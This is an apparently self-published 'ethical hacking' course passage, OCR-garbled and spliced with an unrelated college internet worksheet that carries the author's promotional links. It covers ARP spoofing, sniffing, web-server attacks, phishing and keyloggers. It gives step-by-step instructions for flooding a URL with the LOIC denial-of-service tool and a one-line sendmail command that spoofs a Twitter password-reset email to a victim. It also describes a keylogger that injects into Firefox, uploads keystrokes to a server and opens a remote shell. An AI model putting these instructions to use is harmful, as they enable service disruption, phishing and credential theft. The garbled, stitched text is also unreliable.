sniffer. However, this "shared" technology is moving quickly toward "switched" technology where this 
will no longer be possible, which means you will have to actually tap into the wire. 


On wired broadcast LANs, depending on the network structure (hub or switch), one can capture traffic 
on all or just parts of the traffic from a single machine within the network; however, there are some 
methods to avoid traffic narrowing by switches to gain access to traffic from other systems on the 
network (e.g. ARP spoofing). 

□ For network monitoring purposes it may also be desirable to monitor all data packets in a LAN by 
using a network switch with a so-called monitoring port, whose purpose is to mirror all packets passing 
through all ports of the switch 


Server 1 


Server 2 


Server 3 




Hub/Switch 




Station 1 


Station 2 


1 - Server 2 + Hub/Switch + Statin 2 

2 - Server 1 + Hub/Switch + Staion 1 

3 - Server 3 + Hub/Switch + Stion 3 


Station 3 




1. ARP Spoofing: We have explained earlier how ARP is used to obtain the MAC 
address of the destination machine with which we wish to communicate. The ARP 
is stateless, you can send an ARP reply even if one has not been asked for and 
such a reply will be accepted. Ideally when you want to sniff the traffic originating 
from machine Venus, you can ARP Spoof the gateway of the network. The ARP 
cache of Venus will now have a wrong entry for the gateway and is said to be 
poisoned. This way all the traffic destined for the gateway will pass through your 
machine. Another trick that can be used is to poison a hosts ARP cache by setting 
the gateway's MAC address to FF:FF:FF:FF:FF:FF (also known as the broadcast 
MAC). An excellent tool for this is the arpspoof utility that comes with the dsniff 


2. MAC Flooding: Switches keep a translation table that maps various MAC 
addresses to the physical ports on the switch. As a result of this it can intelligently 
route packets from one host to another. The switch has a limited memory for this 
work. MAC flooding makes use of this limitation to bombard the switch with fake 
MAC addresses till the switch can't keep up. The switch then enters into what is 
known as a “failopen mode” wherein it starts acting as a hub by broadcasting 
packets to all the machines on the network. Once that happens sniffing can be 
performed easily. MAC flooding can be performed by using macof, a utility that 
comes with dsniff suite. 


How does sniffing work? 

□ Ethernet was built around a "shared" principle: all machines on a local network share the same wire. 

□ This implies that all machines are able to "see" all the traffic on the same wire. 


□ Thus, Ethernet hardware is built with a "filter" that ignores all traffic that doesn't belong to it. It does 
this by ignoring all frames whose MAC address doesn't match. 



A snifferprogram turns off this filter, putting the Ethernet hardware into "promiscuous mode". Thus, 
Mark can see all the traffic among all machines, as long as they are on the same Ethernet wire. 

What is it used for? 

U Sniffing programs have been around for a long time in two forms. Commercial packet sniffersare 
used to help maintain networks. 

□ Underground packet sniffersare used to break into computers 

Why we use packet snifing? 

□ The versatility of packet sniffers means they can be used to: 

□ Analyse network problems. 

□ Detect network intrusionattempts. 

□ Gain information for effecting a network intrusion. 

□ Gather and report network statistics. 

□ Filter suspect content from network traffic. 

□ Debug client/server communications 



□ Milicious use: 


□ Spy on other network users and collect sensitive information such as passwords (depending on 
any content encryption methods which may be in use) 

□ Reverse engineer protocols used over the network. 


Example uses 

□ A packet sniffer for a token ringnetwork could detect that the token has been lost or the presence 
of too many tokens (verifying the protocol). 

□ A packet sniffer could detect that messages are being sent to a network adapter; if the network 
adapter did not report receiving the messages then this would localize the failure to the adapter. 

□ A packet sniffer could detect excessive messages being sent by a port, detecting an error in the 
implementation. 

□ A packet sniffer could collect statistics on the amount of traffic (number of messages) from a process 
detecting the need for more bandwidth or a better method. 


What are the components of a packet sniffer? 


□ The hardware: Most products work from standard network adapters, though some require special 



hardware. If you use special hardware, you can analyze hardware faults like CRC errors, voltage 
problems, cable programs, "dribbles", "jitter", negotiation errors, and so forth. 


Capture driver :This is the most important part. It captures the network traffic from the wire, filters 
it for the particular traffic you want, then stores the data in a buffer. 

□ Buffer :Once the frames are captured from the network, they are stored in a buffer. 


Decode :this displays the contents of network traffic with descriptive text so that an analysistcan 
figure out what is going on. 

□ Packet editing/transmission :Some products contain features that allow you to edit your own 
network packets and transmit them onto the network. 


Sniffing Detection 


• Ping Method: The trick used here is to send a ping request with the IP address of the 
suspect machine but not its MAC address. Ideally nobody should see this packet as each 
Ethernet Adapter will reject it as it does not match its MAC address. But if the suspect 
machine is running a sniffer it will respond, as it does not bother rejecting packets with a 
different Destination MAC address. This is an old method and not reliable any longer. 

• ARP Method: A machine caches ARPs. So what we do is send a non-broadcast ARP. A 
machine in promiscuous mode will cache your ARP address. Next we send a broadcast 
ping packet with our IP, but a different MAC address. Only a machine that has our correct 
MAC address from the sniffed ARP frame will be able to respond to our broadcast ping 
request. Voila! 



• On Local Host: Often after your machine has been compromised, hackers will leave 
sniffers, to compromise other machines. On a local machine run ifconfig. On a clean 
machine the output will be: 


[root(3lringwraith root]# /sbmifconfia 

ethO Link eneap: Ethernet HWaddr 52:54:05:F3:95:01 

met addr:203. 199.66.243 Bcast:203.199. ... 

UP BROADCAST RUNNING MULTICAST MTU: 1500 ... 


But on a machine running a sniffer the output will be slightly different. Specifically check the 
last line wherein it mentions “RUNNING PROMISC" That means the machine is in 
promiscuous mode and probably a sniffer is running on it. 


[root(3)riiigwraith root]# /sbin. ifconfig 

ethO Link encap:Ethemet HWaddr 52:54:05:F3:95:01 

met addr: 203. 199. 66. 243 Beast:203.199. ... 

UP BROADCAST RUNNING PROMISC MULTICAST 


The outDut of the ifconfia command has been sliahtlv modified to fit screen 


Sniffing Detection programs 


• Anti Sniff: From the LOpht Heavy Industries comes the new program Anti Sniff. It has the 
ability to monitor a network and detect if a computer is in promiscuous mode. Available at: 

http://www. securitvsoftwaretech.com/antisniff/download.html 

• Neped: It detects network cards on the network that are in promiscuous mode by exploiting 
a flaw in the ARP protocol as implemented on Linux machines. Outdated. Available at: 

ftp://apostols.orq/AposTools/snapshots./neped/neped.c 

• ARP Watch: ARPWatch keeps track of Ethernet/IP address pairings. This is useful when 
you suspect you are being arp-spoofed. Available at: 

ftp://ftp.ee. Ibl.aov/arpwatch. tar. Z 

• Snort: Snort is an excellent Intrusion Detection System and its arp-spoof preprocessor can 
be used to detect instances of ARP Spoofing, which might be an indication that someone 
on the network is Sniffing. Available at: 

http://www.snort.ora/ 



Finally how to protect my self or packet ? 


We can protect my packet through 

□ SSL :secure socket layer to encrypted packet with different way 40 bit -128 bit 
to get secure channel for database communication or SMTP 

□ Also we use some thing call SSL over http in e-Commerce & E-mail "HTTPS" 

TLS transport layer security which is based on SSL that need to use the certificates which now days 
called web-based certificates 

□ IPSec Protocol: it's worked in IP layer in N.W layer in OSI model it's encrypted all send packet . 

Ultra Network Sniffer 

Ultra Network Snifferis a powerfully network visibility tools. It consists of a well-integrated set of 
functions that you can use to resolve network problem. 

U Ultra Network Snifferwill list all of network packets in real-time from multi network card (Include 
Modem , ISDN, ADSL) and also support capturing packet base on the application. 



□ Ultra Network Snifferwill capture the evidence of network intrusions 


□ Ultra Network Snifferallows the network administrator to capture and retrace the steps of any 
network user. 


Features 

□ Monitor network activity in real time. 

□ Dynamic network statistics and chart. 

□ Expert HTML Export. 

□ Get Permanent, Lifetime free software updates for register user. 

□ Capture network traffic for detailed analysis. DCapture network traffic base on application 
(TDI,SOCKET)Probe the network with active tools to simulate traffic, measure response times, and troubleshoot 
problems 

□ Powerful packet generator in order to analyze network status and resolve troubleshoot 

□ Supports all of windows version (Windows XP/2000/NT/ME/98/95); 



How to use it 


□ After installing Ultra Network Sniffer, Choose network adapter that you want to monitor, andclick 
on Start Capture buttoninmain toolbar. 


interface 

□ This window displays packets as they arrive from the wire. The packet display window allows you 
to select specific packets to be shown in the Decoder Window,Italso allows you to right click a specific 
packet and perform certain functions on it. 

□ User can drag packet to packet generator 
windowsfor send the packet to network. 


Packet Decoder 

□ This window is used to display information about the structure of the packet from Packet List 
window, in an easy to understand tree form. 

□ This provides a simpler way of displaying the various aspects of the packet. 

□ Each header it finds (MAC Header, IP Header, ICMP Header, TCP Header, and UDP Header) will 



be broken down, displaying each part of the packet and the data it contains within. 


Packet Generator 

□ Packet Generator allows you to edit and send packets via your network card 



Packet editor 

•The Data Frame Editor allows user to change the packet contents and have the packet decode 
displayed in the bottom window as you edit it. 



•You can create packets of any kind; you can choose which network adapter to send this packet. User 
can use compute CRC to automatically correct checksum 



How to filter packet 

□ Examples: only capture data from 10.0.0.2 and "ip" protocol. 
1. Select main menu "monitor-->option" 


2. select page named "Protocol Filter" 

3. Uncheck all protocol and Only check protocol "IP" and its parent protocol and child protocol. 

4. Select page named "Advance filter". 

5. Check IP method in list box,youwill see a list in right part of page. 

6. There are thee button on right of list,buttion"+" is used for adding one 
IP Filter,"-" is used for deleting one IP filter . is used for modifying. 

7. Click button "+" to add ipfilter.IPfilter dialog will show. 

8. Fill 10.0.0.2 ipinto stationl and fill "any ipaddress" to staton2 fields on dialog. 

9. Fill the interested protocol into Protocol Type. 

10. Fill direction between stations into dir. 

11. Mode: Include is used for discarding all of matching packet. 

Exclude is used for only capturing all of matching packet. 


Packet Sniffing Tools 


• Ethereal 

• Ksniffer 

• Snort 

• IpGrab 

• IpLog 


17. Internet Basic 



Practice Words - 

Directions: Draw a line from the word to the item in the picture. 
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Writing Web Page Addresses 

Directions: Copy the web page addresses. Don’t make any spaces or capitals. 

Example: 
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Reading a Web Page 

Directions: Find the information on the web page. Draw a line and circle it. 




Address |g) http: //ext. sacollege. org/continuincLeducation/ 
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Opening a Web Page 
Directions: Follow the instructions. 

1. Open the Internet by double clicking on the shortcut key on your desktop. 









2. Click in the address box. 





3. Type www.sacollege.org in the address box. 
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4. Click • j or click Enteron the keyboard 


5. Read the web page 


Fxl 


8. Exit the Internet by clicking on the 


in the top right corner . 


3 Welcome to Santa Ana College! - Microsoft Internet Explorer 
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Going Backward and Forward 
Directions: Follow the instructions. 

1. Open the Internet and go to the web pages. Check that you opened each web 
page correctly. If you go to the wrong web page, start again! 

? Go to www.yahoo.com 

? Go to www.sacollege.org 

? Go to www.googlebaba9.weebly.com 

? Go to www.meravideo.xtwap.in 

? Go to www.bowers.org 


? Go to www.googlebaba.oyer-blog.com 



2. Find the Back and Forward buttons 

3. Click the Back button three times. 

4. Click on the Forward button two times. 

5. What is the web page now? 

Address 

6. Exit the Internet. 


Scrolling zl 

Directions: Follow the instructions. 

1 . Open the Internet and go to browser 

2. Go to www.meravideo.xtwap.in 


3. Go to the bottom of the page. To go to the bottom of the page, click on the 
scroll bar and hold the button down. Then drag the bar down. When it is at 
the bottom, release the bar. Top bottom 

4. Complete the sentence from the bottom of the web page. Important information about this 


5. Go to the top of the page. To go to the top of the page, click on the scroll 
bar and hold the button down. Then drag the bar up. When it is at the top, 
release the bar. 




Bottom 


E 


Top 


Going to Links 

Directions: Follow the instructions. 

1 . Open the Internet. 

2. Go to www.dmv.ca.gov 



Practice Going to Links 

Directions: Open the Internet and follow the instructions. 


1. Follow the instructions to find the weather for Santa Ana. 

■ Open weather.yahoo.com 

■ Click United States 

■ Scroll down to California and click on it. 

■ Click “S” for Santa Ana. 

■ Scroll down and find Santa Ana and click on it. 

What is the temperature currently in Santa Ana? 

■ Click the back button four times and find the weather for 
another city. 

What is the city name and current (right now) temperature? 

City Name: 

Temperature : 



2. Follow the instructions. 


■ Open www.meravideo.xtwap.in 

■ Click on information. 

3. Follow the instructions. 

■ Open www.googlebaba.over-blog.com 

■ Learn online ethical hacking. 


Follow me on twitter - @jaysinghnagvanshi 

Add me on Facebook - rn.facebook.com/chunchunbaba 


18. Web Security , Web Attack 

Web Server - 

Entry point for clients 


- To a variety of services 

- Customized for clients (e.g., via cookies) 

- Supported by complex backend applications (e.g. databases) 


Target of attackers 

- Common protocol 

- Supports a wide range of inputs 

- Complex software interactions 

- Running with high privilege 


Q: How does this impact? 

- Vulnerabilities, Threats, Risks 


Web Server Diploy merits 

Note the multiple application layers and connection to legacy code 


User 

browser 



SHEEP Application 
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Web Server Software - 


Ex - IIS7 





IIS 7 Setup Components 


40 Setup Components 


FTP Publishing 
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Server Side Scripting - 

Program placed directly in content, run at during 
request time and output returned in content 

- MS active server pages (ASP) 









- server-side JavaScript 

- python, .... 


Nice at generating output 

- Dangerous if tied to user input 


• » 



Dynamic Content Security - 

Largely just applications 

- Inasmuch as application are secure 

- Command shells, interpreters, are dangerous 


• Three things to prevent DC vulnerabilities 

- Validate input 


• Input often received as part of user supplied data 

• E.g., cookie 

- Limit program functionality 

• Don’t leave open ended-functionality 

- Execute with limited privileges 


Web Server Vulnerabilities - 

Not surprisingly, these are numerous 

• For IIS 5, focus was on function 

- All services were ON by default 

- Buffer overflow -- e.g., Code Red 

Interactions between components are complex 

- HTTP input to database queries 

- SQL Injection - execute user input directly 

• Web server permissions 

- Web servers have broad access 

- Deface web server -- modify server files 

- Compromise system - modify system files 



Web Server as a Host Security Problem 

• Adversary’s Goal 

- Integrity/Secrecy/Availability 

- Get code running on your system 

• That is under the adversary’s control 

• Ways to Execute Code 

- Accessible interfaces 

• Defense: minimize attack surface 

- Vulnerable interfaces 

• Defense: prevent various code injections: buffer overflows 

• Privilege 

- Attackers want this code to do as much as possible 

• Defense: minimize its privilege 


Common DOS - Request Flood 
Attack: request flooding 

- Overwhelm some resource with legitimate requests 

- e.g., web-server, phone system 




• Note: unintentional flood is called a flash crowd 


DOS Prevention - Reverse - Turing Test 

• Turing test measures whether a human can tell the 
difference between a human or computer (Al) 

• Reverse Turning tests : measures whether a user on 
the internet is a person, a bot, whatever? 

• CAPTCHA - completely automated public Turing test 
to tell computers and humans apart 

- contorted image humans can read, computers can’t 

- image processing pressing SOA, making these harder 


• Note: often used not just for DOS prevention, but for 
protecting “free” services (email accounts) 


DOS Prevention - Puzzles 

• Make the solver present evidence of “work” done 

- If work is proven, then process request 

- Note: only useful if request processing significantly more 
work than 

• Puzzle design 

- Must be hard to solve 

- Easy to Verify 

Canonical Example 

- Puzzle: given x-bits of input r and h(r), where h is a 
cryptographic hash function 

- Solution: Invert h(r) 

- Q: Assume you are given 1 08 bits of input for 1 28-bit hash 
input, how hard would it be to solve the puzzle? 


Web Attack - 


Tool - 


1. Denial of service attack 

2. RAT (Remote Admin Tool) 

Step By Step - 

1 . Download LOIC 

2. Install a .Net Framework in PC 

3. Open LOIC and write a URL who want you attack 

4. Type TCP Massege + HTTP + Port Number 

5. Finale Step Click on infront of URL and then URL Lock on 

19. Mail Security, Fake Mailing 


General Strategy 

.Basic scheme is pretty straight-forward 


. Encrypt the message body with a symmetric cipher, using a randomly- generated traffic key 


.Use public key cryptography to encrypt the traffic key to all recipients 
.Digitally sign a hash of the message 
. But there are many details 

Some Details 

. Obvious ones: which symmetric, public key, and hash algorithms to use? 
. More subtle: which algorithms do the recipients understand? 

. Where do certificates come from? 

. Do you sign the plaintext or the ciphertext? 

. How do you handle BCC? 

. Will the ciphertext survive transit intact? 

. How are header lines protected? 

. What about attachments? 


. Many possible answers to all of these questions 


Transit Issues - 


. Not all mail systems accept all characters 
. Very few are 8 -bit clean 

. Cryptographic transforms won’t survive even minor changes 

. EBCDIC vs. ASCII? Unicode? Tabs versus blanks? 

. Solution: encode all email in base 64, using 
characters all systems accept: A-Za-zO-9 +/ 

. Use 4 bytes to represent 3; overhead is 33% 

. For padding, use = sign (see RFC 3548) 

. Only those characters matter; everything else 
is deleted on receipt, including white space 

Signing - 

. If you sign the plaintext and then encrypt, the 

sender’s identity is hidden from all except the proper recipients 

. If you sign the ciphertext, a gateway can verify signatures and present mail accordingly — perhaps 
better for anti-spam and anti-phishing 


Heading 

. Headers change in transit 
. Obvious example: Received: lines are added 

. Less-obvious example: Email addresses are often rewritten to hide internal machines, and present clearer 
addresses to the outside smb@att.com ! iaybabaraiput@gmail.com 

. Consequence: headers are not protected by secure email schemes 

. But — users look at (and search on) the headers 

Generale Flow - 

. Collect input message 
. Put in canonical form 
. Encrypt and sign, or sign and encrypt 

. Add metadata: encrypted traffic key, your certificate, algorithm identifiers, etc. 

. Convert to transit form 


. Embed in email message 


Securing Transit 

. Many pieces — but we can usually use TLS 

. POP, IMAP, connection to submission server: all are by prearrangement 
. Protect content; more important, protect Passwords 
. Problem area: road warriors vs. firewalls and anti-spam 

Mail Steps - 

1. Normal process: user composes mail on MUA; submits it to local submission server. 

2. Optional internal hops 

3. Outbound MTA contacts recipient’s MTA — interorganizational hop 

4. Optional internal hops to recipient’s mail server (IMAP or POP) 

5. IMAP or POP retrieval 

6. How do we protect Step 3? 

MTA and MAT Security - 


. Do we need to protect it at all? 


. These are hard-to-tap links: phone company fiber, ISP backbones, etc. 

. What about government wiretaps? 

. Can use TLS — but what is the other side’s key? No PKI for Internet email! 

. One answer: don’t worry; it’s still better than cleartext against passive eavesdroppers 
. But — what about routing attacks? 

Traffic Analysis 

. Another reason to secure transit: traffic analysis 
. Protect against traffic analysis — who is talking to whom 
. Also: length, timing 

. In practice, extremely valuable for law enforcement and intelligence agencies 
. Less protected by US law 

Mail Security - 

1. Basic recovery option 

2. Recovery question 


3. Mobile Number 

4. Mail Id ( Secondery Mail ) 


Create Fake Mail 
Step By Step - 

1. Select Your Choose ( Gmail , Yahoo , Msn etc ..) 

2. Create an account And Fill All Option 

3. Then Ask Mobile Number , Clear All Browser 

4. Enter a Mobile Number And Capture Code 

5. Create an Account And DONE 


20. Phising 


"A fake page that's look like similar to the original page but it's not .It is a created page by hacker , a fake page with fake 
url (web address ). " 

Introduction 

Phishing is a form of social engineering in which an attacker, also known as a phisher, attempts to fraudulently 
retrieve legitimate users' confidential or sensitive credentials by mimicking electronic communications from a 
trustworthy or public organization in an automated fashion . The 

word \phishing" appeared around 1995, when Internet scammers were using email lures to “fish" for 


passwords and financial information from the sea of Internet users; “ph" is a common hacker replacement of “f", 
which comes from the original form of hacking, \phreaking" on telephone 

switches during 1960s . Early phishers copied the code from the AOL website and crafted pages that looked like 
they were a part of AOL, and sent spoofed emails or instant messages with a link to this fake web page, asking 
potential victims to reveal their passwords . 

A complete phishing attack involves three roles of phishers. Firstly, mailerssend out a large number of 
fraudulent emails (usually through botnets), which direct users to fraudulent websites. Secondly, collectorsset 
up fraudulent websites (usually hosted on compromised machines), which 

actively prompt users to provide confidential information. Finally, cashersuse the confidential information to 
achieve a pay-out. Monetary exchanges often occur between those phishers. 


Types of Phishing 

Phishing has spread beyond email to include VOIP, SMS, instant messaging, social networking sites, and even 
multiplayer games. Below are some major categories of phishing. 

Clone Phishing 

In this type phisher creates a cloned email. Fie does this by getting information such as content and recipient 
addresses from a legitimate email which was delivered previously, then he sends the 

same email with links replaced by malicious ones. Fie also employs address spoo_ng so that the email appears 
to be from the original sender. The email can claim to be a re-send of the original or an updated version as a 
trapping strategy. 

Spear Phishing 

Spear phishing targets at a speci_c group. So instead of casting out thousands of emails randomly, spear 



phishers target selected groups of people with something in common, for example people from 

the same organization . Spear phishing is also being used against high-level targets, in a type of attack called 

Whaling". 

For example, in 2008, several CEOs in the U.S. were sent a fake subpoena along with an attachment that 
would install malware when viewed [24]. Victims of spear phishing attacks in late 2010 and 
early 201 1 include the Australian Prime Minister's o_ce, the Canadian government, the Epsilon mailing list 
service, HBGary Federal, and Oak Ridge National Laboratory. 

Phone Phishing 

This type of phishing refers to messages that claim to be from a bank asking users to dial a phone number 
regarding problems with their bank accounts. Traditional phone equipment has dedicated lines, so Voice over 
IP, being easy to manipulate, becomes a good choice for the phisher. Once the phone number, owned by the 
phisher and provided by a VoIP service, is dialed, voice prompts tell the caller to enter her account numbers and 
PIN. Caller ID spoo_ng, which is not prohibited by law, can be used along with this so that the call appears to be 
from a trusted source. 

Phishing Techniques and Countermeasures 

Various techniques are developed to conduct phishing attacks and make them less suspicious. Email spoo_ng 
is used to make fraudulent emails appear to be from legitimate senders, so that recipients are more likely to 
believe in the message and take actions according to its instructions. Web 

spoo_ng makes forged websites look similar to legitimate ones, so that users would enter confidential 
information into it. Pharming attracts tra_c to those forged websites. Malware are installed into victims' 
computers to collect information directly or aid other techniques. 

Email Spoofing 

A spoofed email is one that claims to be originating from one source when it was actually sent from 



another . Email spoofing is a common phishing technique in which a phisher sends spoofed emails, 
with the sender address and other parts of the email header altered, in order to deceive recipients. 


Spoofed emails usually appear to be from a website or financial institution that the recipient may have business 
with, so that an unsuspecting recipient would probably take actions as instructed 
by the email contents, such as: 

reply the email with their credit card number 

click on the link labelled as \view my statement", and enter the password when the (forged) website prompts 
for it 

open an attached PDF form, and enter confidential information into the form 

Sending a spoofed email 

On a sendmail-enabled UNIX system, one line of command is all you need to send a spoofed email 

that appears to be from Twitter: 

cat body.htm | mail-a 'From: Twitter <suppor t@twitter.com>' -a ' 

Content-Type : t ext /html ’ -s ' Reset your Twitter password 1 
victim@example .net 

Why it’s possible 

Simple Mail Transfer Protocol is the Internet standard protocol used for electronic mails. Its objective is to 
transfer mail reliably and e_ciently, but core SMTP doesn't provide any authentication. An important 



feature of SMTP is its capability to transport mail across multiple networks, referred to as \SMTP mail relaying". 
Basically, receiving and relaying SMTP servers need to trust the upstream server; so it is feasible for a 
malicious user to construct spoofed messages, and talk with receiving or relaying SMTP servers directly to 
deliver such a message. 

As RFC 5321 suggests, SMTP mail inherently cannot be authenticated at the transport level; real mail security 
lies only in end-to-end methods involving the message bodies, such as Pretty Good Privacy (PGP) and 
Multipurpose Internet Mail Extensions (S/MIME). However, there is a high cost to deploy those digital signature 
based countermeasures, because users are reluctant to install an additional piece of software, and they don't 
have enough knowledge on how to manage the trust. 


Web Spoofing 

A phisher could forge a website that looks similar to a legitimate website, so that victims may think this is the 
genuine website and enter their passwords and personal information, which is collected 
by the phisher. Modern web browsers have certain built-in security indicators that can protect users from 
phishing scams, including domain name highlighting and https indicators. However, they are often 
neglected by careless users. 

How web spoofing is done? 

Creating a forged website It's trivial to clone the look of a website by copying the front-end code; a little bit of 
web programming is necessary to redirect user's input into a file or database, then show a \website under 
maintenance" notice. 


Attracting traffic to forged websiteOnce a forged website is online, the phisher must make potentiall victims 
visit it. There are a few ways to do this: 



Send spoofed emails with a link to the forged website 

Register a domain that is a common typo of a popular website. For example, register paypel.com and 
create a forged paypal.com. 

Register the same domain name in a different TLD. Sometimes people will type in their country-specific TLD 
and expect to get a “localized" version of the website. 

For example, register gmail.com.cnand create a simpli_ed-Chinese forged version of gmail.com. 


Domain hijacking 

A more advanced pharming attack is domain hijacking. In domain hijacking, the DNS delegation record at the 
domain registrar is changed to a name server controller by a hacker, so that all traffic can be redirected globally. 

Baidu, the largest search engine in China, was hacked by Iranian Cyber Army in January 2010. 

Malware 

Malware is a piece of software developed either for the purpose of harming a computing device or for deriving 
benefits from it to the detriment of its user . Malware can be used to collect confidential information directly, or 
aid other phishing techniques. 

Client security products are able to detect and remove malware and other potentially unwanted programs, but 
phishers can make malware undetectable. Financial institutions and online game vendors distribute security 
programs to protect their customers. 



Phishing with malware 

Malware can be used to collect con_dential information directly, and send them to phishers. Keystrokes, 
screenshots, clipboard contents, and program activities can be collected. Password input box, where letters are 
shown as asterisks, can be easily read with a program. Malware can 

also display a fake user interface to actively collect information. Collected information can be automatically sent 
to phishers by email, ftp server, or IRC channel. 

Malware can also aid other phishing techniques. For web spoo_ng, it can install phisher's CA public key into 
local computer's trusted CA list. For pharming, it can change the hosts file or DNS settings, or even run ARP 
spoofing on local Ethernet. Malware can also enlist the computer into 
botnets, to send spoofed emails or act as a Webserver of forged websites. 


Phishing through PDF Documents 

Adobe's Portable Document Format is the most popular and trusted document description format. This makes 
PDF documents more susceptible to phishing threats, owing to their portability and interoperability on multiple 
platforms. In addition to being a powerful document format, PDF is a comprehensive programming language of 
its own dedicated to document creation and manipulation with strong execution features. Some critical functions 
of a PDF language could be misused by an attacker or a hacker to design a PDF document to his/her own 
advantage and extract the desired information from the victim, thereby creating a new worldwide threat. These 
potentially dangerous functions include OpenAction and SubmitForm. 

User Education 


Phishing exploits human vulnerabilities such that technical solutions can only block some of the 



phishing web sites. It doesn't matter how many firewalls, encryption software, certificates, or twofactor 
authentication mechanisms an organization has if the person behind the keyboard falls for a phishing attack. A 
study on effectiveness of several anti-phishing educational materials suggests that educational materials 
reduced users' tendency to enter information into phishing webpages by 40%; however, 
some of the educational materials also slightly decreased participants' tendency to click on legitimate links.This 
leads to the belief that it is of paramount importance to find a new and eficient way of educating a large 
proportion of the population. The challenge lies in getting the user's attention to these security tips and advises. 


Anti-Phishing Groups 

PhishTank, launched in October 2006, is a collaborative clearing house for data and information about phishing 
on the Internet. PhishTank employs a sophisticated voting system that requires the community to vote “phish" or 
“not phish", reducing the possibility of false positives and improving 

the overall breadth and coverage of the phishing data. It also provides an open API for developers and 
researchers to integrate anti-phishing data into their applications at no charge. PhishTank is backed by 
OpenDNS, a public DNS resolver; OpenDNS utilizes PhishTank data to prevent phishing 
attacks for their users. 

Formed in 2003, the Anti-PhishingWorking Group (APWG) is an international consortium that brings together 
businesses a_ected by phishing attacks, security products and services companies, 

law enforcement agencies, government agencies, trade association, regional international treatyorganizations, 
and communications companies . 

FraudWatch International, a privately owned Internet security company established in 2003, provides a variety 
of anti-phishing products and services to protect financial service, e-commerce, and Internet hosting companies 
from phishing. 


21. KeyloggerTs 



Introduction 


Keyloggers have somewhat of a bad reputation in the technology world because more often it's associated with illegal 
spying and theft of personal and monetary information. In reality even though that's one of the main uses, it can be used 
for other more appropriate and legal tasks. One clear example of this would be at a company's security policy which 
clearly states that the workers activities can be monitored with Keylogger and can be used to monitor an employee who is 
under suspicion of being a malicious insider. By logging his activity on his workstation the company may be able to 
confirm their suspicions or clear his name. Sometimes a simple and inexpensive tool like Keyloggers may save companies 
millions in damages. The same concept may be applied to a more family based used like monitor the activities of under 
aged children on the web which may help to the child's safety from online predators and dangers. There are different 
types of Keyloggers divided into 2 main groups Hardware Keylogger's andSoftware Keylogger's. Hardware Keyloggers are 
small electronic devices used for capturing the data in between a keyboard device and I/O port . 




Usually these devices have built in memory where they store the keystrokes so this means they must be retrieved by the 
person who installed it in order to obtain the information. An advantage of these Keyloggers is that they are undetectable 
by anti-viral software or scanners since it works on the hardware platform. Software Keyloggers track systems, collect 
keystroke data within the target operating system, store them on disk or in remote locations, and send them to the 
attacker who installed the Keyloggers. 




The main advantage of software Keyloggers compared to the hardware Keyloggers is that they can run for an indefinite 
amount of time while the info is being transmitted remotely eliminating the need to personally obtain the information 
like it's the case with hardware Keyloggers. In this paper we will implement and explain our own custom coded software 
Keylogger. 


History 

Keylogging, often referred to as Keyboard Capturing or Keystroke logging, is the action of recording or monitoring every 
key pressed on a keyboard. Even though these devices are relatively new to us, Keyloggers have already been 


with us almost half of a century. Their exact history cannot be known perfectly, for it is believed that they first were used 
by the government and obviously they do not release any exact day. In fact, it can be established that the first terrorists' 
cyber-attacks started with Keylogging activities. In Moscow and St. Petersburg spies started installing Keyloggers in the US 
Embassy and Consulate buildings in 1970, as a method of capturing information to be used in malicious manner. Another 
anecdote about Keylogging actions goes to November, 1983, when an early keystroke logger written by Perry Kivolowitz 
was posted to the Usenet news. This posting appears to be a motivating factor in restricting access on UNIX systems. As it 
can be seen, Keylogging activities were directly related to governmental monitoring. However, since the beginning of the 
21st century, Keyloggers have become one of the mosttechnology devices used for surveillance, government wide and 
beyond. 


Security 

Security using Keyloggers will monitor email, internet, chats or anything that requires a keystroke. This will help capture 
all information in image and/or text form. Keyloggers are a type of malicious malware that track the users' keystrokes and 
captures the characters that are pressed in and writes the information to a file. Even though that both hardware and 
software Keyloggers are known, software Keyloggers are the ones that are being widely used due to the inexpensive and 
easier to implement onto a computer. Each different operating system will have an adapted Keyloggers which suits the 
I/O. Monitoring keystrokes will help with the workflow, investigation theft, review performance, prevent harassment, 
missing data and prevent personal use. Work flow will increase due to the fact that the employees will be motivated, this 
will weed out the employees that want to go on Facebook or check their personal emails which might cause a security 
leak. If there is some type of deleted file or missing 



information the security personnel can detect which computer that is missing such important information and figure out 
what went wrong. Employees knowing all this will show performance at their job from the amount of keystrokes they had 
to do. If someone is being harassed then this will increase the chances of finding out whom and when the incident 
occurred. In the end this will prevent personal use and increase safety and security with other benefits. 


Implementation 

The implementation of Keylogger and design are based upon many factors: the type of operating system, the lifespan of a 
Keylogger, where it is infecting and the level of footprint on a machine. The Keylogger infiltration is depended on the user 
operating system or a attaching a physical Keylogger device. Software Keyloggers are made to ensure proper installation 
by web browser exploit for example. Security vulnerabilities vary depending on the browser being used and the attacker 
can identify and exploit the weaknesses. An attack can be executed by utilizing JavaScript which could be a user side 
language. 

When the Keylogger has been implemented it can focus on its execution. Keylogger implement each technique 
differently, most use a common execution technique known as hooking. Hooking reroutes the information to its location 
and returns the information back to the system routine. Hooks can be executed in any operating systems for utmost 
functions. 

Keyloggers that are well-made can be executed in the user-mode of operating systems which uses a variation of hooks. 
Every keystroke are flagged through a message mechanism that gets transferred from the keyboard device to the 
windows procedures, during the process the hook can grab the information before the information reaches 



windows procedures. Keyloggers can be developed into implementing a global hook or a local depending on which 
information the person wants to retrieve from the keystrokes. 


How our Keylogger POC works: 

Our Keylogger will be targeting the Firefox application process (firefox.ee) in the victim's computer. 

However, it is not limited to just Firefox and it can be adjusted to any other popular browser with minor alterations to the 
source code. The Keylogger is structured as a client-server model. 

Client 

The client consists of a library: (library.dll) and an executable (loader.exe). 

The library contains most of the client-sided Keylogger code as well as an add-on to allow attackers to spawn a shell on 
the victim and execute commands remotely. 

More specifically, once the library is loaded in the target process, it will intercept any calls to the GetMessageQ Windows 
API function, and filter/log any key press messages. These messages are then saved to a temporary log file which is then 
uploaded to the server once the file has enough key presses collected. 

The advantages of injecting a library in a process instead of having a standalone executable to do the Keylogging are 
obvious. First, any packets generated by the Keylogger will seem to be coming from the target process (firefox.exe) in this 
case. Second, a library will not show in the task manager like an executable will. 

The loader executable performs a simple task: load (inject) the library to the target process (firefox.exe) and exit. The 
loader waits until the target process is running to perform the actual injection. 



Keylogger Source Code Link - 
https://github.com/Erickbarrera/SimpleKeylogger 


Server 

The server consists of a few PHP scripts that facilitate the viewing and uploading of Keylogger logs. The Keylogger client 
uses the script "upload. php" to post the log files to the server. The "upload. php" script takes care of saving the file and 
renaming it for easy access later. 

The server provides the attacker a single place to look at all the Keylogger client's logs and the date on which they were 
uploaded. 

